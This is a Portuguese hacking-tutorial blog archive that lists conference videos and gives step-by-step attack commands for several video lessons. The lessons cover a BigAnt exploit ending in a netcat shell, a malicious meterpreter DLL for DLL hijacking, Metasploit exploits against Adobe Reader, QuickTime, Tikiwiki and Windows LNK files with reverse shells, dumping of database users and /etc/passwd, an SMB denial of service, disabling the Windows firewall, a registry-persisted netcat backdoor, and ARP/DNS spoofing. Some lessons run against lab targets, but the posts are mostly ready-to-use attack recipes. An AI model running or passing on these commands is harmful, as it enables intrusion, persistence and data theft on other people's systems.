banner468

Mostrando postagens com marcador Vídeos. Mostrar todas as postagens
Mostrando postagens com marcador Vídeos. Mostrar todas as postagens

quarta-feira, 2 de novembro de 2011

Vídeo do Webinar da "CLAVIS - segurança da informação"

 A Clavis é uma empresa especializada em soluções e treinamentos de segurança da informação. Visando sempre suprir as necessidades de seus clientes de forma inovadora e abrangente, a Clavis investe pesado no treinamento interno de sua equipe de analistas, além de fomentar pesquisas na área e apoiar diversos eventos e congressos relacionados à Segurança da Informação. Sempre se utilizando dos mais confiáveis e consolidados métodos e técnicas em sua atuação, a Clavis oferece qualidade internacional em seus serviços e treinamentos.

A Clavis oferece ao mercado soluções na área de implementação segura de serviços de redes de computadores, administração de servidores, análise de risco e vulnerabilidades, auditoria de redes e servidores, elaboração de Plano Diretor de Tecnologia e Segurança da Informação, respostas a incidentes de segurança computacional, análise forense entre outros. Mais informações sobre as soluções e serviços ofertadas pela Clavis Segurança da Informação podem ser visualizadas em Soluções.

A Clavis também oferta ao mercado treinamentos abertos e in-company específicos na área de segurança da informação, visando capacitar seus alunos nos temas mais atuais sobre o assunto em questão. A Academia Clavis conta hoje com inúmeros treinamentos específicos, entre eles podemos citar: Análise Forense computacional, Fundamentos de Criptografia, Teste de Invasão em Redes sem Fio, Teste de Invasão em Redes e Sistemas, Fortalecimento (Hardening) de Servidores Unix/Linux, Proteção de Perímetro - Sistemas de Monitoramento, Fundamentos - Redes de Computadores, Fundamentos - Sistema Operacional Linux, entre outros. Mais informações sobre a Academia Clavis pode ser visualizado em: Treinamento.

A Academia Clavis, através da parceria com certificadora americana EC-Council, é centro de treinamento oficial das Certificações Certified Ethical Hacker(CEH) e Computer Hacking Forensic Investigator (CHFI).



Webinar #1 – Metasploit Framework – Apresentação da ferramenta, sua arquitetura e funcionalidades

O que é o Metasploit Framework?

O Metasploit Framework é uma ferramenta para desenvolvimento e lançamento de exploits muito utilizada em auditorias Teste de Invasão. O framework consiste em uma série de ferramentas, exploits e códigos que podem ser utilizados através de diferentes interfaces.

http://www.blog.clavis.com.br/webinar-1-metasploit-framework-apresentacao-da-ferramenta-sua-arquitetura-e-funcionalidades/

Webinar #2 – Análise Forense em Tráfego de Rede

O que é Análise Forense?

A análise forense computacional consiste em um conjunto de técnicas para coleta e exame de evidências digitais, reconstrução de dados e ataques, identificação e rastreamento de atividades.

http://www.blog.clavis.com.br/webinar-2-analise-forense-em-trafego-de-rede/

Webinar #3 disponível – Principais Ameaças a Aplicações Web – Top 10 do OWASP

http://www.blog.clavis.com.br/webinar-3-principais-ameacas-a-aplicacoes-web-%e2%80%93-top-10-do-owasp/

domingo, 30 de outubro de 2011

Vídeos do ShmooCon 2011


ShmooCon é anual East coast de hackers, convenção que teimam em oferecer três dias de uma atmosfera interessante para demonstrar a exploração da tecnologia, soluções inventivas software e hardware, e abrir discussões de questões críticas de infosec. Quatro faixas oferecer aos nossos convidados com uma rica diversidade de informações. A conferência corre noite de sexta a tarde de domingo e será realizada 27-29 janeiro de 2012 no Hilton Hotel Washington em Washington DC.

ShmooCon participantes são uma mistura de funcionários do governo, prestadores de serviços, profissionais de segurança de grandes indústrias, estudantes e professores de academia que estão se concentrando em segurança da informação, software de segurança e fabricantes de hardware e, é claro, hackers. Como um grupo que tem densidade gadget de alta, uma propensão para discutir os aspectos esotéricos dos problemas de segurança e, em geral gostam de vestir preto t-shirts.

A conferência tem vendido cada um dos sete anos anteriores. Este ano, esperamos que 1400 participantes pagos, e cerca de 1600 participantes, uma vez oradores, vendedores, funcionários e membros da imprensa estão incluídos. Como regra geral, não coletamos dados demográficos sobre nossos participantes. Nós estimamos que 35% por cento dos nossos visitantes vêm da metropolitana Washington, DC, incluindo Baltimore e Virgínia do Norte. Outros participantes oriundos de todo os Estados Unidos, Canadá e Europa.

Participantes ShmooCon esperar um certo nível de anonimato e por isso nós não fornecer dados específicos sobre os nossos participantes a terceiros.

Vídeos de 2011:

ShmooCon 2011: Visual Malware Reversing: How to Stop Reading Assembly and Love the Code http://www.youtube.com/watch?v=9nlWbDdxKjw
ShmooCon 2011: Printer to PWND: Leveraging Multifunction Printers During Penetration Testing http://www.youtube.com/watch?v=MPhisPLwm2A
ShmooCon 2011: Keynote: Analytic Framework for Cyber Security http://www.youtube.com/watch?v=rDP6A5NMeA4
ShmooCon 2011: Inside the App: All Your Data are Belong to Me http://www.youtube.com/watch?v=diAMOkGr1JY
ShmooCon 2011: Hop Hacking Hedy http://www.youtube.com/watch?v=aMBaO94Q49U Or on Vimeo Part 1: http://www.vimeo.com/19544885 Part 2: http://www.vimeo.com/19552869 Part 3: http://www.vimeo.com/19556670 Part 4: http://www.vimeo.com/19574828
ShmooCon 2011: Printers Gone Wild! http://www.youtube.com/watch?v=GZgLX60U3sY
An Evite from Surbo? Probably an invitation for trouble Part 1: http://www.youtube.com/watch?v=DE0dpwLGlQ8 Part 2: http://www.youtube.com/watch?v=EyApUYTrNOQ Part 3: http://www.youtube.com/watch?v=i41U1cxyJKs
ShmooCon 2011: Project Ubertooth: Building a Better Bluetooth Adapter http://www.youtube.com/watch?v=KSd_1FE6z4Y
ShmooCon 2011: Hackers for Charity http://www.youtube.com/watch?v=7mjLbbUmpw8
ShmooCon 2011: USB Autorun attacks against Linux http://www.youtube.com/watch?v=ovfYBa1EHm4
ShmooCon 2011: URL Enlargement: Is it for You? http://www.youtube.com/watch?v=mkg1bOZmCFU
ShmooCon 2011: Defeating mTANs for profit http://www.youtube.com/watch?v=5X0SGgZtX8w
ShmooCon 2011: Are you receiving me? Recent issues in wifi privacy http://www.youtube.com/watch?v=JHLebJ6BYdU
Armitage’s Top 10 Power User Features (Shmoocon 2011 Firetalks) http://www.youtube.com/watch?v=OJ0-H1rC8ds
ShmooCon 2011: ZigBee Security: Find, Fix, Finish http://www.youtube.com/watch?v=SvCbIOwblqM
ShmooCon 2011: Stealing Sensitive Data from Thousands of Systems Simultaneously with OpenDLP http://www.youtube.com/watch?v=kz3M–LhyBg

http://en.wikipedia.org/wiki/ShmooCon

segunda-feira, 4 de julho de 2011

Curso de BackTrack 5 em Espanhol



Uma iniciativa da OMHE (Hackers Éticos Mexicano), digirido por Hector Lopez, fez alguns screencast, documentando o uso da distro backTrack 5, cheguei a participar das primeiras screecast, hoje tem o total de 5 aulas.
As aulas são em Espanhol, mostrando o uso básico do sistema.Recomendado para iniciantes que querem aprender a utilizar essa excelente distribuição.

Foi primeiramente divulgado entre os membros do Brasil-Underground.

Primeira Classe:
http://player.vimeo.com/video/24798862

Segunda Classe:
http://player.vimeo.com/video/24798945

Terceira Classe:
http://player.vimeo.com/video/24798976

Quarta Classe:
http://player.vimeo.com/video/25641642

Quinta Classe:
http://player.vimeo.com/video/25641613

Sexta Classe:
http://player.vimeo.com/video/27265723

Sétima Classe:
http://player.vimeo.com/video/27502676

Oitava Classe:
http://player.vimeo.com/video/30102263

Baixar:
http://www.backtrack5.omhe.org/

Meus mirror:
Classe 01 http://www.4shared.com/file/G3JitJOR/Backtrack5-Online-Classe01.html
Classe 02 http://www.megaupload.com/?d=YK9XYBR4 ou http://www.4shared.com/file/e583VUhD/Backtrack5-Online-Classe02.html
Classe 03 http://www.4shared.com/file/A6U7t5Jl/Backtrack5-Online-Classe03.html
Classe 04 http://www.4shared.com/file/6nrYJ2vB/Backtrack5-Online-Classe04.html
Classe 05 http://www.4shared.com/file/IF5f1F6V/Backtrack5-Online-Classe05.html
Classe 06 http://www.4shared.com/file/3XhNKOI7/Backtrack5-Online-Classe06.html
Classe 07 http://www.4shared.com/file/-1bHOfHm/Backtrack5-Online-Classe07.html
Classe 08 http://www.4shared.com/file/ahkHR2qD/Backtrack5-Online-Classe08.html


Senha: bhioreuteamo

sábado, 2 de julho de 2011

Vídeos de Rooted CON 2011



Congresso que visa promover o conhecimento: na edição de 2010 foram lançados vários "0 dias", apresentou os primeiros frutos de ferramentas como o FOCA, EMET, Radare2 ... e contou com figuras históricas, como cena de hacking da rampa e | selvagem | Apostols de, e muitas outras figuras que não foram levantadas na rodada, mas eles estavam.

De acordo com o princípio da neutralidade que rege o Congresso, apresentou um painel já vi na Espanha, com figuras proeminentes, tais como a advocacia Carlos Sánchez Almeida, Marco Francisco Ribas e Xavier, em busca de detalhes do Código Penal ea incorporação de crimes de hackers.

Ele forneceu um ponto de vista empresarial, de modo que aqueles que estão e estarão no mercado de trabalho conhecer a realidade das empresas de segurança, participando estrategistas de grandes empresas, agentes de segurança de grandes corporações e especialistas do governo e da lei Estado.

Além disso, tivemos uma mudança de registo com um olhar cômico para o mundo e a figura do hacker nesta linguagem muito visual.

Tópicos: Engenharia Reversa em Windows e Android, iPhone botnets orientado, banker Trojans e análise forense, princípios de economia aplicada à pirataria, a Teoria das Restrições Goldratt, como se preparar para entrar no mercado de trabalho em segurança, explorar com Oracle Financials "0 dias" incluído como lidar com um sistema global de suporte ao usuário, enganchando em diferentes plataformas, como para fugir de antivírus e firewall pessoal com uma técnica particularmente simples, organização interna das escolas para responder a incidentes no estado, a relação entre crimes de hackers e vários grupos criminosos, ...

No ano passado, nós gastamos muito tempo e esforço: era rígido para iniciar um projeto como esse a partir do zero. Mas graças a você e sua confiança na próxima edição irá aumentar a capacidade da conferência (para você não, ou quase ninguém está impossibilitado de comparecer à esquerda).

Todas essas iniciativas de melhoria são possíveis graças que recebemos de você como participantes de nossos parceiros e patrocinadores. Não nos esqueçamos nem todos os voluntários e outras pessoas que abnegadamente deram-nos boas idéias e esforço e vontade.

Acesso as palestras:
http://vimeo.com/album/1587508/

Ref: http://www.rootedcon.es

domingo, 29 de maio de 2011

Palestra - Analfabetismo digital e responsabilidade objetiva

Palestra dada pelo Dr: Regilberto Girão

Especialidade : Tecnólogo em Segurança Empresarial, Especialista em Segurança Corporativa, Pós-graduando (MBA) em Gestão de Tecnologias da Informação, Pós-graduando em Direito e Tecnologia da Informação e dedicado ao estudo da Segurança da Informação e Comunicações e membro da Comissão de Crimes de Alta Tecnologia da OABSP.

Twitter: http://twitter.com/cibercrime

Parte 01

Parte 02


Parte 03


Parte 04



Parte 05



Parte 06


Parte 07

Palestra na OABSP em 19/05/2011.

sábado, 21 de maio de 2011

Explorando falha no BigAnt


O BigAnt é um software voltado para o uso em empresas, pois ele basicamente é um mensageiro instantâneo no qual o administrador da rede cria um servidor, cria todas as contas que poderão acessá-lo, definindo suas permissões de acesso e senhas, e integra a comunicação dos seus funcionários, não importando o tamanho da sua empresa. Além disso, todas as mensagens trocadas são criptografadas, ou seja, não haverá perigo de alguém roubar informações confidenciais através de uma conversa entre gerentes, por exemplo.

Ao baixar o BigAnt existirão dois arquivos, um é o mensageiro em si e o outro é o console, ou seja, o servidor pelo qual o administrador controlará o andamento das coisas. Instale ambos. A primeira coisa a ser feita é rodar o console e criar um servidor, grupos e usuários. Ao executar o console clique em “demo” para assistir a um vídeo demonstrando o funcionamento básico dele.

Usuários

Depois repasse o IP e nome de usuário e senha para aqueles que venham a utilizar o seu servidor. Por fim, basta inserir esses dados no “messenger” e usá-lo como se fosse o Windows Live Messenger, pois ambos funcionam de maneira muito similar.

Agora que sabemos... vamos a arte da exploração. :)

Ferramentas usadas: 

Comandos:
nmap -p 1-9999 192.168.1.102
cd /pentest/exploits/exploit-db
./searchsploit bigant
cp platforms/windows/remote/10765.py /root/
cd /root/
python 10765.py 192.168.1.102
nc 192.168.1.102 4444

Sobre a aula:
Tamanho: 34 Mb
Formato: AVI
Duração: 3:14
Musica: The Marcels - Blue Moon


domingo, 28 de novembro de 2010

Inguma - Penetration Testing Toolkit - Autoscan


Inguma e um kit de ferramentas de descoberta de vulnerabilidade inteiramente escrita em Python. Seu framework inclui módulos para descoberta de hosts, recolher informações, fuzz targets, força bruta (brute-force), exploits e disassembler.
Os módulos de varredura do inguma são divididos em 5 partes, alem de um autoscan.
Os módulos são "Descobrir", "Reunir", "Força bruta", "Exploits". Inguma pode ser executado em sua própria base python em modo gráfico e pelo terminal.

Nessa aula vou mostrar o uso do autoscan, as demais funções mostro em aulas futuras. Com as informações colhidas eu logo no sistema alvo por ssh.

Sobre o Vídeo:
Tamanho:  6.2 MB
Formato:  MP4
Duração:  3:29 min
Musica: Hip-Hop - Shift Piano
Baixar: http://www.4shared.com/file/xaXM7rxy/Inguma-autoscan.html
On line: http://vimeo.com/17272324



Ref:
http://inguma.sourceforge.net

Dll Hijacking em Windows 7


Nessa aula vou mostrar a técnica de dll hijacker, ela consiste em colocar ou substituir uma dll padrão do sistema operacional por uma dll maliciosa. Uma vez que a dll maliciosa tenho sido modificada, e necessário que ela esteja na mesma pasta do arquivo vulnerável ou substituída o arquivo original na maquina alvo, essa falha e antiga e já vem sendo discutida a mais de 10 anos. Não vou alongar muito o texto, caso queiram saber mais informações, leia as referencias abaixo.
Nesse link você vão pode encontrar uma lista de DLL´s vulneráveis e seus respectivos programas:
http://www.exploit-db.com/dll-hijacking-vulnerable-applications/

Na vídeo aula, crio uma dll maliciosa e um aquivo de vídeo  falso. Fiz de forma simples, não deixei a dll oculta para o melhor entendimento da vídeo, mas para esse ataque se bem sucedido deve envolver um pouco de engenharia social.

Comandos:
msfpayload windows/meterpreter/reverse_https LHOST=IP LPORT=443 D > /Diretório para ser salvo o arquivo/ehtrace.dll
touch Video.flv
use multi/handler
set lhost IP
set lport 443
set payload windows/meterpreter/reverse_https
exploit


Sobre a aula:
Tamanho: 69 Mb
Formato: AVI
Duração: 4:29
Musica: Hip-Hop – Hot shif once again
Baixar: http://www.4shared.com/file/yqv2OQRJ/Dll-hijacker_Windows_7_.html
On line: http://vimeo.com/17250307





REF:
http://en.wikipedia.org/wiki/DLL_Hijacking
http://www.exploit-db.com/dll-hijacking-vulnerable-applications/
http://en.wikipedia.org/wiki/Dynamic-link_library
http://blog.metasploit.com/2010/08/exploiting-dll-hijacking-flaws.html
http://www.rec-sec.com/2009/05/12/dll-hijacking-vulnerability/
http://www.informationweek.com/news/windows/security/showArticle.jhtml?articleID=228200659

domingo, 7 de novembro de 2010

Denial of Service em Windows (DoS)

_| Introdução |_
Olhando alguns auxiliares do mestasploit, resolvi procurar algum pra DoS.
O que encontrei e para ataque em rede local, pesquisando um pouco mais sobre essa falha, descobri que módulo explora uma falha no SRV.Sys driver do sistema operacional Windows.

É afetas as versões do Windows:
Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows XP Tablet PC Edition
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Professional SP2
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP2
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP Gold 0
Microsoft Windows XP Embedded SP1
Microsoft Windows XP Embedded
Microsoft Windows XP 64-bit Edition Version 2003 SP1
Microsoft Windows XP 64-bit Edition Version 2003
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows XP 64-bit Edition
Microsoft Windows XP 0
Microsoft Windows Server 2003 Web Edition SP1 Beta 1
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows Server 2003 Standard Edition SP1 Beta 1
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1 Beta 1
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition SP1 Beta 1
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter x64 Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1 Beta 1
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition SP1 Beta 1
Microsoft Windows Server 2003 Datacenter Edition SP1
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Advanced Server SP4

_| Comandos |_
nmap -O 192.168.1.1/24 
msfconsole
use dos/windows/smb/ms06_063_trans
set lport 445 (Essa opção vem configurada por padrão)
run

_| Sobre a vídeo |_
Tamanho:  18.7 Mb
Formato: AVI
Duração: 4:35
Musica: Afoga o ganso - Turma da 98
Baixar: http://www.4shared.com/file/UX4fFsVH/DOS-Windows.html




_| Referencias |_
http://pt.wikipedia.org/wiki/Ataque_de_nega%C3%A7%C3%A3o_de_servi%C3%A7o
http://www.osvdb.org/27644
http://www.microsoft.com/technet/security/bulletin/MS06-063.mspx
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2006-3942
http://www.securityfocus.com/bid/19215
http://www.metasploit.com

Driftnet & Ettercap (Farenjando JPEG)

Introdução \___
O driftnet, foi inspirado no Etherpeg(para SO Apple Macintosh), o Driftnet fareja e decodifica qualquer JPEG em sessões TCP, visto por qualquer pessoal em sua rede. O programa esta no estagio inicial de desenvolvimento, e sobre a licença GNU/GPL, ainda da para fazer umas modificações, desde o farejamento de áudio. No menu do programa, a outra configuras que vocês podem vasculhar, e ate mesmo salva as imagens capturas.
Para que o Driftnet pudesse captura as imagens de minha rede, eu usei o Ettercap.

Comandos \__
driftnet -h
driftnet -i eth0
ettercap -T -Q -M arp -i eth0(interface de rede) // //

Sobre o vídeo \__
Tamanho: 23,9 Mb
Formato: AVI
Duração: 4:27
Musica: Só Os Loucos Sabem - Charlie Brown Jr.
Baixar: http://www.4shared.com/file/8DcnrxbU/DriftnetEttercap.html




Referencias \__
http://www.ex-parrot.com/~chris/driftnet/
http://backtrack.offensive-security.com/index.php/Tools
http://ettercap.sourceforge.net/
http://en.wikipedia.org/wiki/Ettercap_%28computing%29

sábado, 6 de novembro de 2010

Iniciando o FluxBox no BackTrack 4 R1

Ola pessoal, fiz uma vídeo aula simples de como iniciar o fluxbox no BackTrack 4.

Informações sobre o gerenciador de janelas FluxBox:
http://pt.wikipedia.org/wiki/FluxBox
http://fluxbox.org/
__________
Comandos: |______
dragon
desktop fluxbox
flux-for-back -s
desktop kde
reboot
_____________
Sobre o Video: |_____
Formato: AVI (.rar)
Tamanho: 19.3 Mb
Duração: 8:58 min
Musica: Stromae - Alors on danse
Baixar: http://www.4shared.com/file/yITjCcXG/fluxbox-bt4.html


Duvidas e sugestões, reporte abaixo.

domingo, 31 de outubro de 2010

Explorando vulnerabilidade no Tikiwiki

 ______
/ Sinopse \________________________

Vou mostrar nessa vídeo aula um ataque ao serviço Tikiwiki, que é o serviço de gerenciamento de conteúdo através da web.
Primeiramente rodei um postscan (Nmap) em uma determinado host, logo encontrando a porta 80 aberta(Porta de serviço web), testei em um navegador para testa se o serviço realmente estava funcionando, logo apos usei o Dirbuster para listar os diretórios do serviço web. Testei alguns ate encontrar o campo de login.
Com essa informações em mãos, parti para o ataque, mostrei a auditoria com o metasploit e manual, como vocês vão pode observar, podemos obter o mesmo resultado.

 __________________
/ Informações adicionais \___________

O serviço Tikiwiki estava rodando em um sistema operacional Ubuntu 8.04 modificado pela equipe do Metasploit e chamado de Metasploitable.
A equipe do Metasploit procurei colocar o máximo de vulnerabilidades possíveis, e uma ótima distro para teste de penetração.
As vulnerabilidades: http://www.metasploit.com/documents/express/Metasploitable.txt
Baixar o ISO(torrent): http://www.metasploit.com/documents/express/Metasploitable.zip.torrent

 ________
/ Comandos \________________________

nmap 192.168.1.4
java -jar DirBuster-0.12.jar -u http://192.168.1.4
msfconsole
search tikiwiki
use use admin/tikiwiki/tikidblib
set RHOST 192.168.1.4
exploit
tiki-listpages.php?offset=0&sort_mode=
mysql -h 192.168.1.105 -u root -p root
show databases;
use tikiwiki195;
show tables;
select * from users_users;
http://192.168.1.4/tikiwiki/backups/shell-reverso.php
nc -lvp 8080
cat /etc/passwd
search tikiwiki
use exploit/unix/webapp/tikiwiki_graph_formula_exec
show options
show payloads
setg payload generic/shell_bind_tcp
set lhost 192.168.1.5
set rhost 192.168.1.5
show options
exploit
ls
whoami
cat /etc/passwd

 ___________
/ Sobre o Video \____________________

Tamanho: 40.08 Mb
Formato: AVI
Duração: 12:54
Musica: Clint Mansell - Requiem for a Dream
Autor: Fabiano Matias
Baixar: http://www.4shared.com/file/Z6nHD7AX/tikiwiki.html
On line: http://www.vimeo.com/16375616







 _________
/ Referencias \______________________

http://www.backtrack-linux.org/forums/backtrack-videos/
http://blog.metasploit.com/2010/05/introducing-metasploitable.html
http://www.metasploit.com/documents/express/Metasploitable.txt
http://www.metasploit.com/
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
http://nmap.org
http://pt.wikipedia.org/wiki/TikiWiki
http://www.exploit-db.com/exploits/2701/
http://pentestmonkey.net/tools/php-reverse-shell/
http://www.metasploit.com/documents/express/Metasploitable.zip.torrent
http://www.osvdb.org/30172
http://www.securityfocus.com/bid/20858
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2006-5702
http://secunia.com/advisories/22678/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2007-5423
http://www.osvdb.org/40478
http://www.securityfocus.com/bid/26006

Publicado nos parceiros do Blog:

http://www.darkside-forums.com.br/ipb/topic/446-vulnerabilidade-no-tikiwiki/
http://www.chmod.com.br/vb/showthread.php?10388-Vulnerabili**de-no-TikiWiki
http://www.re-b.net/home/viewtopic.php?f=41&t=325
Forum-underground no momento em manutenção

quinta-feira, 16 de setembro de 2010

Vulnerabilidade no Adobe Reader 9.3.4(0day)


Mais uma vulnerabilidade no Adobe reader (CVE-2010-2883), dessa vez do tipo 0day. Olhando os novos exploits apos uma atualização do metasploit, encontrei esse e resolvi fazer uma aula, a versão do adobe usada na aula foi a 9.3.4 ultima versão disponível e o sistema operacional alvo "Windows 7" mas funciona em versões anteriores. Mas uma vez o Metasploit na frente de seus concorrentes... :P

Comandos:
use exploit/windows/fileformat/adobe_cooltype_sing
set payload windows/meterpreter/reverse_tcp
set lhost IP
exploit
use multi/handler

Sobre o Vídeo: 
Formato:  AVI
Tamanho:  18.8 MB
Duração: 5:59 min
Musica:  Carl Orff - Carmina Burana - O Fortuna

Ref:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2883
http://www.osvdb.org/67849
http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html
http://www.adobe.com/support/security/advisories/apsa10-02.html

domingo, 12 de setembro de 2010

Metasploit - Vulnerabilidade no QuickTime 7.6.7 (0day)


Nessa aula mostro como explorar a vulnerabilidade no QuickTime, essa vulnerabilidade e classificada de 0day e afeta todas as versões do QuickTime e do Windows. Ela foi descoberta pelo Investigador de segurança Ruben Santamarta.

Comandos:
use exploit/windows/browser/apple_quicktime_marshaled_punk
set SRVHOST SeuIP
set SRVPORT 80
set URIPATH /
set payload windows/shell/reverse_tcp
set LHOST SeuIP
set LPORT 5050
exploit

Sobre o Vídeo:
Formato:  AVI
Tamanho: 8.2 MB
Duração: 3:57 min
Musica: Mantenha o Respeito - Marcelo D2 
Baixar: http://www.4shared.com/file/eKgQCHTr/0day-quicktime.html




Referencia:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-1818
http://www.osvdb.org/67705
http://reversemode.com/index.php?option=com_content&task=view&id=69&Itemid=1

SET + Metasploit - WebDAV DLL hijacker

Nessa aula mostro com explorar WebDAV DLL hijack usando o SET integrado com Metasploit.


Sobre o Vídeo:
Formato:  AVI
Tamanho: 12.5 MB
Duração: 3:12 min
Musica: Toca uma regueira aí - Armandinho

Baixar: http://www.4shared.com/file/X6cJru8-/SET-DLL_Hijacker.html

Ref:
http://blog.zoller.lu/2010/08/cve-2010-xn-loadlibrarygetprocaddress.html
http://www.acrossecurity.com/aspr/ASPR-2010-08-18-1-PUB.txt

quinta-feira, 9 de setembro de 2010

Metasploit - Mudando o Banner


Vídeo aula simples de como trocar o banner do metasploit, a aula foi feita a pedido de um usuario do blog. Qualquer duvida reporte abaixo.

Baixar: http://www.4shared.com/file/Yp_AdMBB/Mudando_banner.html




terça-feira, 7 de setembro de 2010

Vulnerabilidade de atalho do Windows - CVE-2010-2568 - Metasploit + Ettercap



Vulnerabilidade de atalho nos sistemas operacionais Windows das versões Windows XP SP2 e SP3, Server 2003 SP2, Vista SP1 e SP2, Server 2008 SP2 e R2, e Windows 7, que permite a execução de códigos maliciosos através dos arquivos de atalho fabiano.LNK ou fabiano.PIF que e direcionado para um DLL malicioso.
Maiores informações em:
http://www.microsoft.com/technet/security/bulletin/MS10-046.mspx
http://www.microsoft.com/technet/security/advisory/2286198.mspx

O que eu fiz?
Usei o metasploit para preparar o ataque fazendo um servidor e o ettercap fazendo um MITM, e direcionando todo trafego da minha rede local para minha maquina.

Comandos:
use windows/browser/ms10_046_shortcut_icon_dllloader
set LHOST 192.168.1.4
set PAYLOAD windows/meterpreter/reverse_tcp
EditorDeTexto /usr/share/ettercap/etter.dns
*.* A SeuIP
ettercap -T -q -P dns_spoof -M ARP // //

Sobre o Vídeo:
Formato: AVI
Tamanho: 12.6 MB
Duração: 4:45 min
Autor: Fabiano Matias aka Bhior
Musica:  Cachimbo da paz - Gabriel o Pensador
Baixar: http://www.4shared.com/file/MzP5k2eD/Windows_LNK_CVE-2010-2568.html

Referencia:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2568
http://www.osvdb.org/66387
http://www.microsoft.com/technet/security/bulletin/MS10-046.mspx
http://www.microsoft.com/technet/security/advisory/2286198.mspx
http://adrenaline.com.br/seguranca/noticias/5616/criminosos-exploram-icones-de-atalhos-para-espalhar-malware.html

domingo, 29 de agosto de 2010

Metasploit - Desabilitando Firewall



O que acontece?
Configurei o firewall do Windows XP sp2 contra postscan, rodo o nmap e ele nos mostra todas as porta filtradas. Então executo um backdoor na maquina windows, ganho acesso ao shell do sistema (cmd.exe ou prompt de comando) e desabilito o firewall.
O comando usado na aula e nativo do sistema operacional Windows e não um recurso do metasploit.
Minha intenção nessa aula e de mostrar a importância de se conhecer um sistema operacional a fundo. 

Comandos: 
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost MeuIP
set lport Porta
exploit
netsh firewall set opmode disable

Video:
Formato: AVI(.rar)
Duração: 4:15 m
Tamanho: 10.6 MB
Autor: Fabiano Matias aka Bhior
Musica: Vinny - Heloísa, mexe a cadeira

Baixar: http://www.4shared.com/file/IrHQby36/Desabilitando_firewall.html
On-line: http://vimeo.com/14528642

Ref:
http://support.microsoft.com/kb/947709/pt-br
http://technet.microsoft.com/pt-br/library/cc778925%28WS.10%29.aspx
www.metasploit.com
www.nmap.org 

domingo, 1 de agosto de 2010

Backdoor com netcat iniciando com o Windows

Nessa aula mostro com adicionar uma entrada no regedit do Windows, para que um arquivo inicie junto como o sistema operacional.

O que eu fiz?

Tinha acesso a maquina via meterpreter, usei recurso da mesma para upar o netcat na pasta system32 do sistema, adicionei uma entrada no regedit e redirecionei para netcat iniciar junto com o sistema operacional, configurei uma porta e o tipo de acesso que eu gostaria de ter no sistema.

Programas:

Metasploit
Netcat

Comandos:

HKEY_LOCAL_MACHINE - Software - Microsoft - Windows - CurrenteVersion - Run
-v Nome da entrada -d "Localdoarquivo -L -d -p 'Porta' -e cmd.exe(acesso ao sistema)"


Informações:

Metasploit - www.metasploit.com
Backdoor - http://pt.wikipedia.org/wiki/Backdoor
Comandos DOS - http://pt.wikipedia.org/wiki/DOS

Video:

Tamanho: 13.9 mb
Formato: avi
Duração: 5:11 min
Musica: Avenue - Crew 7 / Gasolina - Daddy yankee


Baixar: http://www.4shared.com/file/jhKM28Pi/backdoor-iniciando-com-windows.html 


domingo, 25 de julho de 2010

Internet e logon automático no Backtrack 4

Dica básica de como iniciar o backtrack 4 automaticamente e já configurado a internet.

Em modo gráfico, abra o Shell: 
kate /root/.bash_profile

Digite: 
start-network
wicd-client

Salve o arquivo e reinicie o micro. Você perceberá que carregará o modulo "wicd", vai mostrar no canto inferior esquerdo do painel, o ícone de conexão com a internet.

Novamente abra o arquivo .bash_profile:
kate /root/.bash_profile

Pode apagar o wicd-client que já esta configurado e digite:
start-network
startx 

Reinicie o micro novamente, você notará que vai pedir só o login e senha.

Assista on-line:



 

Subscribe to our Newsletter

Contact our Support

Email us: youremail@gmail.com

Our Team Memebers